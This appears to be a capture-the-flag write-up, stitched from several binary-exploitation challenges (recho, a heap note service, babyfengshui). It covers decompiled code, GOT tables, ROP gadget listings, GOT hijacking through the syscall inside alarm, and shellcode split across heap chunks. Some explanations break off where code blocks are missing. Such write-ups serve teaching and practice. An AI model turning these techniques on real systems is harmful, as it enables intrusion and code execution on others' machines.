// local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, constchar **argv, constchar **envp) { char nptr; // [rsp+0h] [rbp-40h] char buf[40]; // [rsp+10h] [rbp-30h] int v6; // [rsp+38h] [rbp-8h] int v7; // [rsp+3Ch] [rbp-4h]
# flag string .data:0000000000601058 flag db 'flag',0 # plt table .got.plt:0000000000601018 off_601018 dq offset write ; DATA XREF: _write↑r .got.plt:0000000000601020 off_601020 dq offset printf ; DATA XREF: _printf↑r .got.plt:0000000000601028 off_601028 dq offset alarm ; DATA XREF: _alarm↑r .got.plt:0000000000601030 off_601030 dq offset read ; DATA XREF: _read↑r .got.plt:0000000000601038 off_601038 dq offset setvbuf ; DATA XREF: _setvbuf↑r .got.plt:0000000000601040 off_601040 dq offset atoi ; DATA XREF: _atoi↑r
Analysis
The biggest challenge is, there is an endless while loop receiving inputs all the time. though we have a chance to do stack overflow (it reads unlimited chars to buf, which is only 0x30 bytes away from rbp), we dont have a chance to get out of while loop to exit.
Thankfully, in pwntools it has shutdown method to close the stream:
1 2
shutdown(self, direction) "direction must be in ['in', 'out', 'read', 'recv', 'send', 'write']"
However after closing stream, there will be no further interaction, so no way to leak libc or so. But this program has no system, so we can only build a one-time ROP chain to read flag and output it.
There is a tip for alarm:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
$ gdb -q /usr/lib/x86_64-linux-gnu/libc.so.6 pwndbg: loaded 177 commands. Type pwndbg [filter] for a list. pwndbg: created $rebase, $ida gdb functions (can be used with print/break) Reading symbols from /usr/lib/x86_64-linux-gnu/libc.so.6... Reading symbols from /usr/lib/debug/.build-id/9c/9b4c997fbbff4ea98320bb8c286051f9ed6513.debug... pwndbg> disassemble alarm Dump of assembler code for function alarm: 0x00000000000cb2d0 <+0>: mov eax,0x25 0x00000000000cb2d5 <+5>: syscall 0x00000000000cb2d7 <+7>: cmp rax,0xfffffffffffff001 0x00000000000cb2dd <+13>: jae 0xcb2e0 <alarm+16> 0x00000000000cb2df <+15>: ret 0x00000000000cb2e0 <+16>: mov rcx,QWORD PTR [rip+0xf2b89] # 0x1bde70 0x00000000000cb2e7 <+23>: neg eax 0x00000000000cb2e9 <+25>: mov DWORD PTR fs:[rcx],eax 0x00000000000cb2ec <+28>: or rax,0xffffffffffffffff 0x00000000000cb2f0 <+32>: ret End of assembler dump.
A syscall locates at the 5 offsets of the alarm start, we can use that by overwriting alarm in GOT as syscall (just add 0x5 to it is ok) and call it. It can be called GOT hijacking. Search add gadgets:
$ ROPgadget --binary recho --only "add|ret" Gadgets information ============================================================ 0x00000000004008af : add bl, dh ; ret 0x00000000004008ad : add byte ptr [rax], al ; add bl, dh ; ret 0x00000000004008ab : add byte ptr [rax], al ; add byte ptr [rax], al ; add bl, dh ; ret 0x00000000004008ac : add byte ptr [rax], al ; add byte ptr [rax], al ; ret 0x0000000000400830 : add byte ptr [rax], al ; add cl, cl ; ret 0x00000000004008ae : add byte ptr [rax], al ; ret 0x00000000004006f8 : add byte ptr [rcx], al ; ret 0x000000000040070d : add byte ptr [rdi], al ; ret 0x0000000000400832 : add cl, cl ; ret 0x00000000004006f4 : add eax, 0x20098e ; add ebx, esi ; ret 0x000000000040070a : add eax, 0x70093eb ; ret 0x00000000004006f9 : add ebx, esi ; ret 0x00000000004005b3 : add esp, 8 ; ret 0x00000000004005b2 : add rsp, 8 ; ret 0x00000000004005b6 : ret
Unique gadgets found: 15
And search pop gadgets:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
$ ROPgadget --binary recho --only "pop|ret" Gadgets information ============================================================ 0x000000000040089c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 0x000000000040089e : pop r13 ; pop r14 ; pop r15 ; ret 0x00000000004008a0 : pop r14 ; pop r15 ; ret 0x00000000004008a2 : pop r15 ; ret 0x00000000004006fc : pop rax ; ret 0x000000000040089b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 0x000000000040089f : pop rbp ; pop r14 ; pop r15 ; ret 0x0000000000400690 : pop rbp ; ret 0x00000000004008a3 : pop rdi ; ret 0x00000000004006fe : pop rdx ; ret 0x00000000004008a1 : pop rsi ; pop r15 ; ret 0x000000000040089d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret 0x00000000004005b6 : ret
Unique gadgets found: 13
As for system call number you can check /usr/include/asm/unistd_32.h and /usr/include/asm/unistd_64.h for 32-bit and 64-bit.
1 2 3 4 5 6 7 8 9
$ more /usr/include/asm/unistd_64.h #ifndef _ASM_X86_UNISTD_64_H #define _ASM_X86_UNISTD_64_H 1
I rename some items in IDA results to simplify understanding process. show and edit are not implemented.
Analysis
As it only has add and del operations, it is unlikely to have UAF. The vulnerability exists in add because index v1 is not restricted, so we can write anywhere anything. Given that NX is disabled we can write shellcodes and execute on the heap.
A problem is: every note size is in [0,8], but shellcode is definitely longer than this, so we have to think about dividing them into small pieces and connecting them as a chain.
The basic structure of chunks in heap is:
Chunk
Content
Length
Chunk 0
prev_size
0x8 bytes
size
0x8 bytes
Content 0 old fd
0x8 bytes
old bk
0x8 bytes
Chunk 1
prev_size
0x8 bytes
size
0x8 bytes
Content 1 old fd
0x8 bytes
old bk
0x8 bytes
Chunk 2
...
...
However after we write 8 bytes as content to old fd, there is still 8-byte old bk behind, let alone the prev_size and size. We have to use jmp (2 bytes long) for linking shellcode pieces from the former chunk to the next (they are adjacent if allocated in order), and remember the 8th byte is set 0 by program, so it is about 1+8+8+8=25 bytes away:
Chunk
Content
Length
Chunk 0
prev_size
0x8 bytes
size
0x8 bytes
0x5 bytes codes
0x8 bytes
0x2 bytes jmp
0x1 bytes "0"
old bk
0x8 bytes
Chunk 1
prev_size
0x8 bytes
size
0x8 bytes
0x5 bytes codes
0x8 bytes
0x2 bytes jmp
0x1 bytes "0"
old bk
0x8 bytes
Chunk 2
...
...
We use jmp short xxx to jump to a target address and the relation between them is: xxx = target_addr - current_addr - 2 (calculated from existing cases), so here xxx should be 2+1+8+8+8-0-2=25=0x19 (jmp short 0x19).
But add and del can execute codes on the heap neither, so we may need to hijack GOT item. Here I choose to hijack free in GOT because we can trigger it by choosing 4. del note.
GOT content:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
.got.plt:0000000000202000 dq offset stru_201DF8 .got.plt:0000000000202008 qword_202008 dq 0 ; DATA XREF: sub_880↑r .got.plt:0000000000202010 qword_202010 dq 0 ; DATA XREF: sub_880+6↑r .got.plt:0000000000202018 off_202018 dq offset free ; DATA XREF: _free↑r .got.plt:0000000000202020 off_202020 dq offset puts ; DATA XREF: _puts↑r .got.plt:0000000000202028 off_202028 dq offset __stack_chk_fail .got.plt:0000000000202028 ; DATA XREF: ___stack_chk_fail↑r .got.plt:0000000000202030 off_202030 dq offset printf ; DATA XREF: _printf↑r .got.plt:0000000000202038 off_202038 dq offset memset ; DATA XREF: _memset↑r .got.plt:0000000000202040 off_202040 dq offset read ; DATA XREF: _read↑r .got.plt:0000000000202048 off_202048 dq offset __libc_start_main .got.plt:0000000000202048 ; DATA XREF: ___libc_start_main↑r .got.plt:0000000000202050 off_202050 dq offset malloc ; DATA XREF: _malloc↑r .got.plt:0000000000202058 off_202058 dq offset setvbuf ; DATA XREF: _setvbuf↑r .got.plt:0000000000202060 off_202060 dq offset atoi ; DATA XREF: _atoi↑r .got.plt:0000000000202068 off_202068 dq offset exit ; DATA XREF: _exit↑r
The content stores in:
1
.bss:00000000002020A0 qword_2020A0 dq 0Ch dup(?) ; DATA XREF: initial+18↑o
So it is not hard to control index to access GOT items, for example, set index as -(2020A0-202018)/8=-17 to access free in GOT. The whole process is like:
The last thing is to build mov rdi,xxxx # /bin/sh, we need to input it first, then move it to rdi. Considering we have to use free to trigger shellcodes, if we save /bin/sh in a chunk, before executing free the rdi will saves chunk address, which is also the address of /bin/sh.
You may find that we use mov eax,0x3b instead of mov rax,0x3b, that is because mov eax,0x3b is 5 bytes long while mov rax,0x3b is 6 bytes long. But we must add a 2 bytes \xEB\x19 (jmp short 0x19), so 7 bytes only leave us 5 bytes to write. Therefore xor rax,rax is needed.
Or we can hijack atoi in GOT, which is a clever way:
$ file babyfengshui babyfengshui: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cecdaee24200fe5bbd3d34b30404961ca49067c6, stripped $ checksec babyfengshui [*] '/root/babyfengshui' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) $ ./libc.so.6 GNU C Library (Debian GLIBC 2.19-18+deb8u3) stable release version 2.19, by Roland McGrath et al. Copyright (C) 2014 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Compiled by GNU CC version 4.8.4. Compiled on a Linux 3.16.7 system on 2016-02-12. Available extensions: crypt add-on version 2.1 by Michael Glad and others GNU Libidn by Simon Josefsson Native POSIX Threads Library by Ulrich Drepper et al BIND-8.2.3-T5B libc ABIs: UNIQUE IFUNC For bug reporting instructions, please see: <http://www.debian.org/Bugs/>.
We can see in delete() it set pointers as NULL which leads to no UAF.
From add() we can find that in ptr it stores a structure:
This explains why in update() it checks (v3 + *ptr[a1]) >= ptr[a1] - 4, because it looks right. The content of s should not disturb the size of chunk v2 (prev_size is used by s).
The question is: it works only when chunk v2 and chunk s are adjacent!!!
If we add 2 0x80 user first:
Then free user0:
Then add a 0x100 user, you will see:
Now the v2 and s of user2 are not adjacent, so the restriction in update() can be bypassed.
Next we hijack GOT (without atoi, we use free), leak libc base address and calculate system to execute.
Exploit
The given libc is 2.19 but on remote that’s 2.23 (using Libcsearcher to get).
It got alarm() inside, and LibcSearcher takes too much time, so we use ELF module in pwntools to load libc and calculate address.
While /lib32/libc.so.6 on ubuntu16.04 is also improper, so I choose to use libc6-i386_2.23-0ubuntu10_amd64 in the database of LibcSearcher, and it works.